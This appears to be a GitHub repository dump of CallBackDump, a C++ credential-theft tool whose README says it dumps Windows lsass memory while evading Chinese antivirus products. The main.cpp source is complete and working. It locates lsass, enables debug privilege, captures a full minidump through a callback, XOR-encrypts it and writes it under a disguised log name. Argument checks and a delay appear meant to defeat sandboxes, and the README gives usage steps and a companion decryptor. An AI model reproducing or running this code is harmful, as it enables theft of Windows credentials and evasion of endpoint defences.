├── CallbackDump
├── CallbackDump.sln
└── CallbackDump
│ ├── CallbackDump.aps
│ ├── CallbackDump.rc
│ ├── CallbackDump.vcxproj
│ ├── CallbackDump.vcxproj.filters
│ ├── CallbackDump.vcxproj.user
│ ├── global.h
│ ├── main.cpp
│ └── resource.h
├── README.md
├── assets
├── image-20220925164910290.png
├── image-20220928231219634.png
├── image-20220928231615029.png
└── image-20220928231846196.png
└── dumpXor
├── dumpXor.sln
└── dumpXor
├── dumpXor.vcxproj
├── dumpXor.vcxproj.filters
├── dumpXor.vcxproj.user
└── main.cpp
/CallbackDump/CallbackDump.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.3.32825.248
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CallbackDump", "CallbackDump\CallbackDump.vcxproj", "{AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x64.ActiveCfg = Debug|x64
17 | {AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x64.Build.0 = Debug|x64
18 | {AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x86.ActiveCfg = Debug|Win32
19 | {AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Debug|x86.Build.0 = Debug|Win32
20 | {AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x64.ActiveCfg = Release|x64
21 | {AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x64.Build.0 = Release|x64
22 | {AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x86.ActiveCfg = Release|Win32
23 | {AE20B179-5A3A-4AA9-96FA-ACCCB1C721E5}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {61DC3699-9F4E-4BF9-AB81-CCAF773B4ADA}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/CallbackDump/CallbackDump/CallbackDump.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/seventeenman/CallBackDump/d4ac4564e74f1e8258c86dd0f497cad3f8da2aa1/CallbackDump/CallbackDump/CallbackDump.aps
--------------------------------------------------------------------------------
/CallbackDump/CallbackDump/CallbackDump.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/seventeenman/CallBackDump/d4ac4564e74f1e8258c86dd0f497cad3f8da2aa1/CallbackDump/CallbackDump/CallbackDump.rc
--------------------------------------------------------------------------------
/CallbackDump/CallbackDump/CallbackDump.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {ae20b179-5a3a-4aa9-96fa-acccb1c721e5}
25 | CallbackDump
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 | MultiThreaded
122 | false
123 |
124 |
125 | Console
126 | true
127 | true
128 | false
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
--------------------------------------------------------------------------------
/CallbackDump/CallbackDump/CallbackDump.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 |
23 |
24 | 头文件
25 |
26 |
27 | 头文件
28 |
29 |
30 |
31 |
32 | 资源文件
33 |
34 |
35 |
--------------------------------------------------------------------------------
/CallbackDump/CallbackDump/CallbackDump.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CallbackDump/CallbackDump/global.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 |
4 | typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(
5 | ULONG Privilege, BOOL Enable,
6 | BOOL CurrentThread, PULONG Enabled);
7 |
8 | _RtlAdjustPrivilege MRtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
9 | GetModuleHandleW(L"ntdll.dll"), "RtlAdjustPrivilege");
10 |
11 | typedef LPVOID(WINAPI* _HeapAlloc)(
12 | HANDLE hHeap , DWORD dwFlags,
13 | SIZE_T dwBytes);
14 |
15 | _HeapAlloc MHeapAlloc = (_HeapAlloc)GetProcAddress(
16 | GetModuleHandleW(L"Kernel32.dll"), "HeapAlloc");
17 |
18 | typedef HANDLE(WINAPI* _CreateToolhelp32Snapshot)(
19 | DWORD dwFlags, DWORD th32ProcessID);
20 |
21 | _CreateToolhelp32Snapshot MCreateToolhelp32Snapshot = (_CreateToolhelp32Snapshot)GetProcAddress(
22 | GetModuleHandleW(L"Kernel32.dll"), "CreateToolhelp32Snapshot");
23 |
24 | typedef BOOL(WINAPI* _Process32FirstW)(
25 | HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
26 |
27 | _Process32FirstW MProcess32FirstW = (_Process32FirstW)GetProcAddress(
28 | GetModuleHandleW(L"Kernel32.dll"), "Process32FirstW");
29 |
30 |
31 | typedef BOOL(WINAPI* _Process32NextW)(
32 | HANDLE hSnapshot, LPPROCESSENTRY32W lppe);
33 |
34 | _Process32NextW MProcess32NextW = (_Process32NextW)GetProcAddress(
35 | GetModuleHandleW(L"Kernel32.dll"), "Process32NextW");
36 |
37 |
38 | typedef HANDLE(WINAPI* _OpenProcess)(
39 | DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
40 |
41 | _OpenProcess MOpenProcess = (_OpenProcess)GetProcAddress(
42 | GetModuleHandleW(L"Kernel32.dll"), "OpenProcess");
43 |
44 | typedef BOOL(WINAPI* _MiniDumpWriteDump)(
45 | HANDLE hProcess, DWORD ProcessId,
46 | HANDLE hFile, MINIDUMP_TYPE DumpType,
47 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
48 | PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
49 | PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
50 |
51 | _MiniDumpWriteDump MMiniDumpWriteDump = (_MiniDumpWriteDump)GetProcAddress(
52 | LoadLibraryA("Dbghelp.dll"), "MiniDumpWriteDump");
53 |
54 |
55 | extern char * Xorcrypt(char* content, DWORD length ,char* secretKey)
56 | {
57 | for (UINT i = 0; i < length; i++)
58 | {
59 | content[i] ^= secretKey[i % sizeof(secretKey)];
60 | }
61 |
62 | return content;
63 | }
64 |
--------------------------------------------------------------------------------
/CallbackDump/CallbackDump/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #pragma comment (lib, "Dbghelp.lib")
7 | #include "global.h"
8 |
9 |
10 | // Buffer for saving the minidump
11 | LPVOID buffer = MHeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024 * 1024 * 75);
12 | DWORD bytesRead = 0;
13 |
14 |
15 | BOOL CALLBACK minidumpCallback(
16 | __in PVOID callbackParam,
17 | __in const PMINIDUMP_CALLBACK_INPUT callbackInput,
18 | __inout PMINIDUMP_CALLBACK_OUTPUT callbackOutput
19 | )
20 | {
21 | LPVOID destination = 0, source = 0;
22 | DWORD bufferSize = 0;
23 |
24 | switch (callbackInput->CallbackType)
25 | {
26 | case IoStartCallback:
27 | callbackOutput->Status = S_FALSE;
28 | break;
29 |
30 | // Gets called for each lsass process memory read operation
31 | case IoWriteAllCallback:
32 | callbackOutput->Status = S_OK;
33 |
34 | // A chunk of minidump data that's been jus read from lsass.
35 | // This is the data that would eventually end up in the .dmp file on the disk, but we now have access to it in memory, so we can do whatever we want with it.
36 | // We will simply save it to dumpBuffer.
37 | source = callbackInput->Io.Buffer;
38 |
39 | // Calculate location of where we want to store this part of the dump.
40 | // Destination is start of our dumpBuffer + the offset of the minidump data
41 | destination = (LPVOID)((DWORD_PTR)buffer + (DWORD_PTR)callbackInput->Io.Offset);
42 |
43 | // Size of the chunk of minidump that's just been read.
44 | bufferSize = callbackInput->Io.BufferBytes;
45 | bytesRead += bufferSize;
46 |
47 | RtlCopyMemory(destination, source, bufferSize);
48 |
49 | break;
50 |
51 | case IoFinishCallback:
52 | callbackOutput->Status = S_OK;
53 | break;
54 |
55 | default:
56 | return true;
57 | }
58 | return TRUE;
59 | }
60 |
61 |
62 | void nt_wait(DWORD milliseconds)
63 | {
64 | static NTSTATUS(__stdcall * NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandleA(("ntdll.dll")), ("NtDelayExecution"));
65 | static NTSTATUS(__stdcall * ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandleA(("ntdll.dll")), ("ZwSetTimerResolution"));
66 | static bool once = true;
67 | if (once && ZwSetTimerResolution != NULL) {
68 | ULONG actualResolution;
69 | ZwSetTimerResolution(1, true, &actualResolution);
70 | once = false;
71 | }
72 | LARGE_INTEGER interval;
73 | interval.QuadPart = -1 * (int)(milliseconds * 10000);
74 | if (NtDelayExecution != NULL)
75 | {
76 | NtDelayExecution(false, &interval);
77 | }
78 |
79 | }
80 |
81 |
82 | int main(int argc, char* argv[]) {
83 |
84 | if (__argc == 1) {
85 | return 7899 * 1777;
86 | }
87 | else if (__argc == 2) {
88 | if (strcmp(__argv[1], "to") != 0)
89 | {
90 | return 7 * 12899;
91 | }
92 | }
93 | else {
94 | return 1717 * 1888;
95 | }
96 |
97 | nt_wait(10000);
98 |
99 | DWORD PID = 0;
100 | DWORD bytesWritten = 0;
101 | HANDLE lHandle = NULL;
102 | HANDLE snapshot = MCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
103 | LPCWSTR processName = L"";
104 | PROCESSENTRY32 processEntry = {};
105 | processEntry.dwSize = sizeof(PROCESSENTRY32);
106 | ULONG t;
107 |
108 | // Get lsass PID
109 | if (MProcess32FirstW(snapshot, &processEntry)) {
110 | while (_wcsicmp(processName, L"lsass.exe") != 0) {
111 | MProcess32NextW(snapshot, &processEntry);
112 | processName = processEntry.szExeFile;
113 | PID = processEntry.th32ProcessID;
114 | }
115 | }
116 |
117 | // enable debug privilege
118 | MRtlAdjustPrivilege(20, TRUE, FALSE, &t);
119 |
120 | lHandle = MOpenProcess(PROCESS_ALL_ACCESS, 0, PID);
121 |
122 | // Set up minidump callback
123 | MINIDUMP_CALLBACK_INFORMATION callbackInfo;
124 | ZeroMemory(&callbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION));
125 | callbackInfo.CallbackRoutine = &minidumpCallback;
126 | callbackInfo.CallbackParam = NULL;
127 |
128 | // Dump lsass
129 | BOOL isD = MMiniDumpWriteDump(lHandle, PID, NULL, MiniDumpWithFullMemory, NULL, NULL, &callbackInfo);
130 |
131 | if (isD)
132 | {
133 | long int size = bytesRead;
134 |
135 | char *securitySth = new char[size];
136 |
137 | char *key = (char *)"thisisgood";
138 |
139 | memcpy(securitySth,buffer,bytesRead);
140 |
141 | securitySth = Xorcrypt(securitySth, bytesRead, key);
142 |
143 | // At this point, we have the lsass dump in memory at location dumpBuffer - we can do whatever we want with that buffer, i.e encrypt & exfiltrate
144 | HANDLE outFile = CreateFile(L"C:\\Users\\Public\\Downloads\\VM21-6-8.log", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
145 |
146 | //// For testing purposes, let's write lsass dump to disk from our own dumpBuffer and check if mimikatz can work it
147 | if (WriteFile(outFile, securitySth, bytesRead, &bytesWritten, NULL))
148 | {
149 | printf("\n[+] to C:\\Users\\Public\\Downloads\\VM21-6-8.log\n");
150 | }
151 |
152 | CloseHandle(outFile);
153 | }
154 |
155 | return 0;
156 | }
--------------------------------------------------------------------------------
/CallbackDump/CallbackDump/resource.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/seventeenman/CallBackDump/d4ac4564e74f1e8258c86dd0f497cad3f8da2aa1/CallbackDump/CallbackDump/resource.h
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CallBackDump
2 |
3 | 能过国内杀软的dump lsass进程工具,参考代码链接在下面。
4 |
5 | 由minidumpCallback实现,对缓冲区中内存做了些修改后再写入磁盘,同时做了一些小细节修改。
6 |
7 | 需要注意的是别扔云沙箱,这工具也没有任何网络行为。
8 |
9 | 
10 |
11 | 
12 |
13 | 
14 |
15 | # 环境
16 |
17 | VS2022
18 |
19 | # 用法
20 |
21 | `CallbackDump.exe to` 将lsass进程dump成VM21-6-8.log
22 |
23 | `dumpXor.exe VM21-6-8.log 1.bin` 将加密的进程文件解密
24 |
25 | # 详解
26 |
27 | [Dumping Lsass Process Memory In Different Ways - 跳跳糖](https://tttang.com/archive/1810/)
28 |
29 | # 参考链接
30 |
31 | https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
32 |
--------------------------------------------------------------------------------
/assets/image-20220925164910290.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/seventeenman/CallBackDump/d4ac4564e74f1e8258c86dd0f497cad3f8da2aa1/assets/image-20220925164910290.png
--------------------------------------------------------------------------------
/assets/image-20220928231219634.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/seventeenman/CallBackDump/d4ac4564e74f1e8258c86dd0f497cad3f8da2aa1/assets/image-20220928231219634.png
--------------------------------------------------------------------------------
/assets/image-20220928231615029.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/seventeenman/CallBackDump/d4ac4564e74f1e8258c86dd0f497cad3f8da2aa1/assets/image-20220928231615029.png
--------------------------------------------------------------------------------
/assets/image-20220928231846196.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/seventeenman/CallBackDump/d4ac4564e74f1e8258c86dd0f497cad3f8da2aa1/assets/image-20220928231846196.png
--------------------------------------------------------------------------------
/dumpXor/dumpXor.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.3.32825.248
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dumpXor", "dumpXor\dumpXor.vcxproj", "{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x64.ActiveCfg = Debug|x64
17 | {9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x64.Build.0 = Debug|x64
18 | {9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x86.ActiveCfg = Debug|Win32
19 | {9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x86.Build.0 = Debug|Win32
20 | {9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x64.ActiveCfg = Release|x64
21 | {9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x64.Build.0 = Release|x64
22 | {9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x86.ActiveCfg = Release|Win32
23 | {9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {5CB8FD33-C656-4F9D-A594-3BF54C71E196}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/dumpXor/dumpXor/dumpXor.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {9cc63db2-7fc6-4d54-a0e4-cd91e124bfd4}
25 | dumpXor
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 | MultiThreaded
122 | false
123 |
124 |
125 | Console
126 | true
127 | true
128 | false
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
--------------------------------------------------------------------------------
/dumpXor/dumpXor/dumpXor.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 |
--------------------------------------------------------------------------------
/dumpXor/dumpXor/dumpXor.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/dumpXor/dumpXor/main.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/seventeenman/CallBackDump/d4ac4564e74f1e8258c86dd0f497cad3f8da2aa1/dumpXor/dumpXor/main.cpp
--------------------------------------------------------------------------------